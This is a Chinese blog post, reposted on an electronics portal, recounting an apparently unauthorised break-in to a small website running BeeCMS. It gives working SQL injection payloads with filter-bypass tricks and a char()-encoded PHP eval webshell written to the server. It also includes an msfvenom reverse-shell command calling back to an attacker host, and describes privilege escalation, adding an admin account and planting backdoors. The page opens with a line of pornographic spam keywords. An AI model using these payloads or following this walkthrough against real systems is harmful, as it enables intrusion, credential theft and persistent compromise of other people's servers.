国产精品久久久aaaa,日日干夜夜操天天插,亚洲乱熟女香蕉一区二区三区少妇,99精品国产高清一区二区三区,国产成人精品一区二区色戒,久久久国产精品成人免费,亚洲精品毛片久久久久,99久久婷婷国产综合精品电影,国产一区二区三区任你鲁

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

記錄某一次無意點開的一個小網站的滲透過程

工程師鄧生 ? 來源:CSDN ? 作者:Deilty ? 2022-09-09 09:09 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

記錄某一次無意點開的一個小網站的滲透過程,幸運的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網上找了資料,成功getshell并獲取服務器權限。

一、滲透過程

無意點開一個網站,發現網站比較小,且看起來比較老,然后發現logo沒有改,于是乎去百度搜索這個cms,發現有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

這里運氣比較好,沒有更改后臺地址,還是默認地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通過通用漏洞發先后臺管理處存在sql注入漏洞,直接輸入admin’,然后就會報錯,這里用萬能密碼不能登陸,看來還是得通過上面得通用漏洞來進行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到輸入payload后,頁面返回正常,從而可以判斷有sql注入,這里采用雙寫進行繞過a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

發現這個注入點后,就有各種各樣的注入方式了,通過sql語句寫入一句話,sqlmap一把梭,手工注入得到賬號密碼等等,怎么方便怎么來,這里我把幾種方法都寫一下,看看那種方法可以

方法一

1.通過post抓包sqlmap一把梭,dump出管理員賬號密碼,進后臺找上傳點

2.一把梭,發現并沒有,使用腳本也沒有繞過

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通過burp抓包,寫入一句話,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,發現寫入失敗,前面講到有防護,這里通過hex編碼或者char函數繞過

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.對shell部分進行編碼

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.寫入shell的payload為:注意:記得在編碼轉換的時候前面加0x或者直接用unhex函數,但是本次實驗用unhex函數一直失敗,所以在前面加0x,看到可以寫入成功。

ps:這里的寫入路徑純屬盲猜,運氣好,默認目錄

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蟻劍連接,成功連接,至此getshell完畢,下來就是后滲透階段,后面會講

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函數繞過:mysql內置函數char()可以將里面的ascii碼轉換為字符串,payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一樣成功寫入

1.寫入成功后,菜刀可以連接,我們訪問寫入的文件,驚奇的發現竟然有admin,和一串md5碼,大膽猜測可能是后臺賬號和密碼,試一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陸,然后就是后臺找上傳了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后滲透

通過whoami查看權限,發現是admin權限,但是不是最高權限,我們要提到最高權限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通過msf生成木馬提權,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過蟻劍上傳木馬,并執行。執行之前打開msf使用模塊use exploit/multi/handler,設置相應參數,然后開始監聽

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么問題,用這個沒有成功,那么只能通過大馬提權了

方法二

1.上傳大馬,此處應該有狗或者盾之類的,用的免殺,成功上傳

2.訪問大馬

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.這里提權方式很多,就不細說了,有大馬之后很多操作都可以引刃而解了,開放端口,添加賬號,留后門。。等等

4.創建admin權限賬號之后,登陸服務器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的發現

通過掃描目錄,還發現有phpmyadmin,可以爆破,這里我試了下竟然是弱口令,都是root,但是連接不上,只能通過phpmyadmin登陸,發現是低版本的phpstudy搭建的,這里就可以另一種思路,利用日志文件寫入一句話getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、總結 1.前臺sql注入獲取用戶名密碼,進入后臺找上傳 2.SQL注入語句寫入一句話 3.phpmyadmin一句話getshell 4.上傳大馬提權

至此,滲透結束。


審核編輯:劉清

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • SQL
    SQL
    +關注

    關注

    1

    文章

    789

    瀏覽量

    46697
  • 編碼
    +關注

    關注

    6

    文章

    1039

    瀏覽量

    56969
  • ASCII
    +關注

    關注

    5

    文章

    172

    瀏覽量

    36676

原文標題:實戰 | 一次小網站滲透過程

文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關推薦
    熱點推薦

    GD32 usbcdc單片機從機只發送,串口打開第一次自動發最后一次測量的值

    關閉串口,測量會兒(還在發送值),關閉測量(不發值),此時打開串口,按理來說應該沒有值,但是會保留最后一次測量的發送值,這個過程完全沒有receive(如果是PC主機發單片機回應,這是正常的)就只
    發表于 02-04 10:24

    與軸一次成型的微電機轉子磁鐵

    在微型電機領域,與軸一次成型的轉子磁鐵正逐漸成為種被廣泛采用的結構方案,相比傳統“磁鐵+轉軸后裝配”的形式,這類轉子在結構、性能和致性方面都有明顯優勢,特別適合對體積、精度和可靠性要求較高的微電機應用。
    的頭像 發表于 01-27 11:40 ?329次閱讀
    與軸<b class='flag-5'>一次</b>成型的微電機轉子磁鐵

    如何判斷一次消諧器是否工作正常?

    判斷一次消諧器是否正常,其實就看它有沒有“扛住”系統電壓、及時“泄放”諧振能量,同時自己保持“健康”狀態。核心方法是?外觀檢查、電氣參數測試和運行狀態觀察?三管齊下。
    的頭像 發表于 01-22 10:27 ?193次閱讀
    如何判斷<b class='flag-5'>一次</b>消諧器是否工作正常?

    光伏一次調頻設備/一次調頻裝置|光伏一次調頻涉網試驗/光伏電站一次調頻建設改造方案

    2025年以來能源局下發通知要求10KV以上的新能源廠站要具備一次調頻能力,并遞交涉網試驗報告。對于投資規模不大的工商業分布式光伏電站,又要面臨改造投資問題,壓力較大。如何選擇質優價廉的一次調頻產品
    的頭像 發表于 01-17 08:54 ?1196次閱讀
    光伏<b class='flag-5'>一次</b>調頻設備/<b class='flag-5'>一次</b>調頻裝置|光伏<b class='flag-5'>一次</b>調頻涉網試驗/光伏電站<b class='flag-5'>一次</b>調頻建設改造方案

    光伏一次調頻設備,光伏電站一次調頻建設改造方案

    地控制機組有功功率的增減,限制電網頻率變化,使電網頻率維持穩定的自動控制過程。當電網頻率升高時,一次調頻功能要求機組快速減少有功功率的輸出,反之,當電網頻率下降時,一次調頻裝置就會減少發電機組有功功率
    發表于 01-16 20:06

    電網頻率為何不能亂?一次調頻裝置的“維穩”邏輯

    家電故障,大到電網崩潰,都會給生產生活帶來致命影響。而一次調頻裝置,正是守護這條“標準線”的核心力量,用毫秒級響應筑牢電網頻率的“維穩”防線,詳細了解一次調頻裝置可咨詢:1.3.7-5.0.0.4-6.2.0.0。今天就來拆解:電網頻率為何不能亂?
    的頭像 發表于 01-14 11:41 ?195次閱讀
    電網頻率為何不能亂?<b class='flag-5'>一次</b>調頻裝置的“維穩”邏輯

    一次消諧器對電力系統的核心貢獻

    一次消諧器(又稱 PT 一次消諧裝置)是安裝在電壓互感器一次側中性點與地之間的非線性電阻設備,主要應用于3-66kV 中性點不接地或經消弧線圈接地的中壓配電網,對保障電力系統安全穩定運行具有不可替代
    的頭像 發表于 01-07 06:40 ?335次閱讀
    <b class='flag-5'>一次</b>消諧器對電力系統的核心貢獻

    車間協議戰爭調停者:記一次MODBUS TCP與PROFIBUS的融合實戰

    ?車間協議戰爭調停者:記一次MODBUS TCP與PROFIBUS的融合實戰 去年,我們團隊接到改造項目:家大型鋰電池制造廠希望整合其新舊設備的數據流。工廠情況很典型——新建的M
    的頭像 發表于 12-22 14:10 ?199次閱讀
    車間協議戰爭調停者:記<b class='flag-5'>一次</b>MODBUS TCP與PROFIBUS的融合實戰

    解析一次消諧和二消諧的差異與應用場景

    裝置,是兩完全不同的產品。 一次消諧器主要是在電壓互感器PT的開口三角處接入非線性電阻,當系統發生鐵磁諧振時,非線性電阻會迅速動作,將諧振能量消耗掉,從而抑制諧振過電壓。這種方式直接作用于一次系統,能快速有效的消
    的頭像 發表于 12-11 11:33 ?519次閱讀

    固定式測斜儀多久需要校準一次?

    多數工程環境下,固定式測斜儀應每12月進行一次全面校準。對于滑坡體監測、深基坑等高危場景,因位移數據直接影響預警決策,建議縮短至每6月校準一次。新設備首次安裝
    的頭像 發表于 08-13 14:47 ?795次閱讀
    固定式測斜儀多久需要校準<b class='flag-5'>一次</b>?

    adxl355讀數異常,三軸中某一軸數據始終為0怎么解決?

    adxl355芯片,我這邊做了批設備,開始全部工作正常,后續有一次經拆裝后,個別出現了三軸中某一軸讀數全為0的情況,其余兩軸讀數正常(還有一個
    發表于 08-13 07:32

    智能客服驅動效率和體驗升級,上海電信+昇騰AI的一次民生應用實踐

    上海電信+昇騰AI的一次民生應用實踐
    的頭像 發表于 07-30 23:44 ?2944次閱讀
    智能客服驅動效率和體驗升級,上海電信+昇騰AI的<b class='flag-5'>一次</b>民生應用實踐

    移動電源EMC整改:認證失敗到一次通過的實戰經驗

    深圳南柯電子|移動電源EMC整改:認證失敗到一次通過的實戰經驗
    的頭像 發表于 05-26 11:25 ?845次閱讀
    移動電源EMC整改:認證失敗到<b class='flag-5'>一次</b>通過的實戰經驗

    一次消諧裝置與二消諧裝置區別、一次消諧器與二消諧器的區別

    一次消諧器與二消諧器是電力系統中用于抑制諧振過電壓的不同裝置,主要區別如下: 安裝位置:一次消諧器串聯于電壓互感器(PT)一次側中性點與地之間,直接承受高電壓;二
    的頭像 發表于 05-07 09:58 ?4255次閱讀
    <b class='flag-5'>一次</b>消諧裝置與二<b class='flag-5'>次</b>消諧裝置區別、<b class='flag-5'>一次</b>消諧器與二<b class='flag-5'>次</b>消諧器的區別

    一次性使用心電電極片性能測試 深圳

    一次性使用心電電極片性能測試 :YICE0196 心電電極電性能測試儀、 心電電極電性能測試儀(SEAM) 心電電極性能測試儀
    的頭像 發表于 03-19 11:27 ?1414次閱讀
    <b class='flag-5'>一次</b>性使用心電電極片性能測試 深圳<b class='flag-5'>一</b>測